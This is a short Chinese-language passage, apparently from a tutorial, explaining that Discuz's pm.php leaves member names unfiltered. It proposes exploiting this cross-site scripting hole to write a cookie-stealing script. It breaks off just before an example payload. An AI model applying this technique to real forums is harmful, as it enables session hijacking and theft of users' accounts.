这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对   会员名字做过滤,导致我们可以写入一些script.   聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.   这是要像看到颜色 就会反应的!(取自 数学补习班= =")   所以我们先从本端 获取自己cookies看看...   例句:  &...